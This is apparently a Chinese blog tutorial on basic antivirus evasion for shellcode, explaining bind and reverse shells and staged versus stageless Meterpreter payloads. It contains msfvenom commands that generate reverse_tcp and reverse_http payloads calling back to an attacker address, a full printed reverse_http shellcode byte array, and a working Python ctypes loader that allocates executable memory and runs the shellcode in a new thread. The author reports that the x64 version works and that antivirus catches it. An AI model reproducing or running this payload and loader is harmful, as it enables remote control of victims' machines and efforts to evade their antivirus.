shellcode的基础免杀

shellcode基础

什么是shellcode

shellcode是一段由16进制组成的机器码，因为经常可以让攻击者受到被害机器的shell而得名(但现在shellcode功能更多样，比如添加用户或者执行特殊命令，特殊进程等但是都被统称为shellcode)，其特点是在于它可以无文件落地，直接在内存中运行，以至于一般杀毒软件无法查杀到。一般来说，shellcode会在目标机器上建立一个新的shell进程，然后同攻击者进行通信，接受攻击者的指令，然后返回结果。那么如何建立一个shell进程呢？在Unix中使用execve命令可以建立，而在windows下需要调用内核API来建立。

shellcode的方向

shellcode一般分为正向和反向。在msf中，我们经常会发现一个payload有reverse的前缀（表示为反向）它们的原理如下:

正向

正向的payload原理是在目标机器上打开一个端口启动服务，攻击机主动连接打开的端口获得shell。

但是这种模式存在缺点，如果网络不存在外部进入的连接，那么shell就无法建立。并且管理员也有可能会发现可疑的shell进程。

反向

反向shellcode就是为了解决网络不允许外部进入的连接而构成的。shellcode使受害机器主动来连接我们在公网上的ip，之后创建一个shell进程接受我们的命令。

stager与stageless

在msf中我们也经常看到以下payload：

windows/x64/meterpreter/reverse_tcp 
windows/x64/meterpreter_reverse_tcp

这两个看起来都是一样的，便是meterpreter形式(meterpreter个人认为是一种加强了的shell，它带着一些后渗透的功能，方便操作者执行)的以反向tcp连接到攻击机。它们的区别在于上面的是stager，下面的是stageless。

stager其实是一段很简单的加载器，其目的是与攻击机建立一个隧道。 接下来攻击机想要执行另外的功能就会通过这条隧道把所需的shellcode(这里是用来执行命令的shellcode)发送到受害机，受害机载入内存执行，达到新的攻击效果。

而stageless就是把上面所需的功能给集合到一起了。只需要接受来自攻击机的命令就好，不需要在传送另外的数据。这也是为什么stageless比stager体积更大。

加载器和源码

我们在msf中通过命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe

生成的shell.exe文件其实主要包含以下部分：

exe中包含关键的shellcode（其只占一小部分），更多的是加载器，加载器的目的就是把shellcode压入内存，而压入内存就代表计算机执行命令，我们成功getshell。

shellcode基础调用

因为我没有学过C语言，所以我只能使用python来调用shellcode。要使用python调用shellcode，这里需要用到以下知识：

ctypes

ctypes是python的内置的一个模块，可以实现动态链接库的调用以及c语言结构的相关的编程。既然可以调用动态链接库，那么就代表我们可以调用动态链接库中的函数。我们需要关注的动态链接库主要有kernel32.dll,user32,dll,ntdll.dll，这三个动态链接库对于windows来讲都是重要的动态链接库文件。

用到的API函数

VirtualAlloc
RtlMoveMemory
CreateThread
WaitForSingleObject

1.VirtualAlloc

虽然翻译的中文晦涩难懂，但是看得出来它是在申请内存地址。其参数如下：

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,  //要分配地址的起始地址。
  [in]           SIZE_T dwSize,      //申请区域的大小，以字节为单位
  [in]           DWORD  flAllocationType, //内存分配的类型
  [in]           DWORD  flProtect      //内存保护常量，但是同时也兼具分类内存执行的权限。
);

2.RtlMoveMemory

它的任务就是转移内存内容。

VOID RtlMoveMemory(
  _Out_       VOID UNALIGNED *Destination, //源头
  _In_  const VOID UNALIGNED *Source,   //目标地址
  _In_        SIZE_T         Length     //转移的大小
);

3.CreateThread

HANDLE CreateThread(
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes, //安全属性，一般设置为0或者null
  [in]            SIZE_T                  dwStackSize, //初始栈的大小
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress, //线程函数地址
  [in, optional]  __drv_aliasesMem LPVOID lpParameter, //线程函数
  [in]            DWORD                   dwCreationFlags, //创建线程标志
  [out, optional] LPDWORD                 lpThreadId //线程id
);

4.WaitForSingleObject

等待线程执行完成

DWORD WaitForSingleObject(
  [in] HANDLE hHandle,  //句柄
  [in] DWORD  dwMilliseconds   //等待标志
);

基础调用

在msf中先生成shellcode

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.137.133 LPORT=4444 -f c

这一串就是我们的shellcode，我们需要做的就是把这一串代码压入内存。接着在开发工具中编辑以下代码。

import ctypes
#为什么前面要加b，因为在内存中，程序都是以二进制运行，我们需要转成byte类型。
shellcode = b""
shellcode += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
shellcode += b"\x8b\x52\x0c\x8b\x52\x14\x31\xff\x0f\xb7\x4a\x26\x8b\x72\x28"
shellcode += b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
shellcode += b"\x75\xef\x52\x8b\x52\x10\x8b\x42\x3c\x57\x01\xd0\x8b\x40\x78"
shellcode += b"\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x8b\x48\x18\x01\xd3\x50"
shellcode += b"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xac"
shellcode += b"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
shellcode += b"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
shellcode += b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
shellcode += b"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
shellcode += b"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
shellcode += b"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x78\x00\x00\x00"
shellcode += b"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61"
shellcode += b"\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20"
shellcode += b"\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x32\x5f\x32\x5f\x31"
shellcode += b"\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35"
shellcode += b"\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c"
shellcode += b"\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f"
shellcode += b"\x6d\x65\x2f\x39\x38\x2e\x30\x2e\x34\x37\x35\x38\x2e\x38\x31"
shellcode += b"\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00"
shellcode += b"\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\x5c"
shellcode += b"\x11\x00\x00\xe8\x3d\x01\x00\x00\x2f\x47\x57\x51\x77\x72\x51"
shellcode += b"\x4e\x4f\x4b\x66\x47\x39\x4e\x72\x77\x33\x33\x77\x57\x63\x45"
shellcode += b"\x77\x5f\x59\x65\x43\x5f\x78\x74\x63\x52\x57\x56\x76\x44\x41"
shellcode += b"\x4a\x67\x33\x4e\x53\x45\x6c\x6c\x4c\x46\x47\x67\x54\x6f\x5f"
shellcode += b"\x32\x71\x39\x33\x38\x78\x70\x70\x61\x6e\x59\x49\x47\x4e\x50"
shellcode += b"\x34\x37\x72\x35\x2d\x75\x30\x7a\x31\x62\x2d\x6b\x43\x78\x72"
shellcode += b"\x75\x6c\x73\x50\x5f\x32\x30\x31\x54\x39\x4a\x72\x38\x78\x61"
shellcode += b"\x53\x62\x6d\x56\x66\x49\x78\x72\x6d\x6d\x6b\x48\x70\x34\x79"
shellcode += b"\x30\x6b\x31\x43\x4a\x49\x4e\x47\x5a\x37\x44\x54\x58\x6a\x4b"
shellcode += b"\x76\x70\x56\x72\x55\x42\x79\x6f\x33\x4e\x48\x76\x76\x4d\x77"
shellcode += b"\x78\x4d\x61\x6a\x57\x44\x46\x4c\x42\x58\x62\x6d\x43\x47\x4e"
shellcode += b"\x72\x51\x4d\x57\x35\x65\x4a\x35\x48\x78\x6f\x74\x44\x53\x50"
shellcode += b"\x64\x67\x52\x6b\x6e\x31\x57\x36\x77\x6c\x75\x41\x4e\x4f\x56"
shellcode += b"\x46\x55\x45\x62\x77\x65\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5"
shellcode += b"\x89\xc6\x53\x68\x00\x02\x68\x84\x53\x53\x53\x57\x53\x56\x68"
shellcode += b"\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x0a\x5f\x53\x53\x53\x53\x56"
shellcode += b"\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88\x13\x00"
shellcode += b"\x00\x68\x44\xf0\x35\xe0\xff\xd5\x4f\x75\xe1\xe8\x4c\x00\x00"
shellcode += b"\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68"
shellcode += b"\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20"
shellcode += b"\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcf"
shellcode += b"\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x7f\xff\xff"
shellcode += b"\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x37\x2e\x31\x33"
shellcode += b"\x33\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"



def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64  # 指定virtualloc函数的返回值类型
    # 定义virtualloc函数,为什么它的参数fiallocationtype要指定为0x3000，它是0x1000和0x2000给它加起来。即又申请了到物理内存，又申请到虚拟内存。
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    # 把shell写入缓冲区
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    # 调用rtlmovememort函数，把shellcode从缓冲区移动到申请的虚拟内存
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
    #制造线程，第三个参数即我们需要调用的线程函数地址
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr),
                                                 ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))


if __name__ == '__main__':
    shellCodeLoad(bytearray(shellcode))

试着运行一下发现程序会议某种奇奇怪怪的异常结束。

这里困扰了我很久，在网上找了半天也没遇到相近的问题，我还怀疑过是自己win11系统很特殊，于是还用过虚拟机的win10来，仍然不行。后面搞了很久，最后怀疑是shellcode问题，因为我们生成的shellcode并没有设定系统的位数，也许这会是一个突破口，遂尝试了一下。

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.137.133 LPORT=4444 -f c

生成新的shellcode，接着同样的方法调用。

调用成功。

虽然立刻很开心的被火绒杀掉了…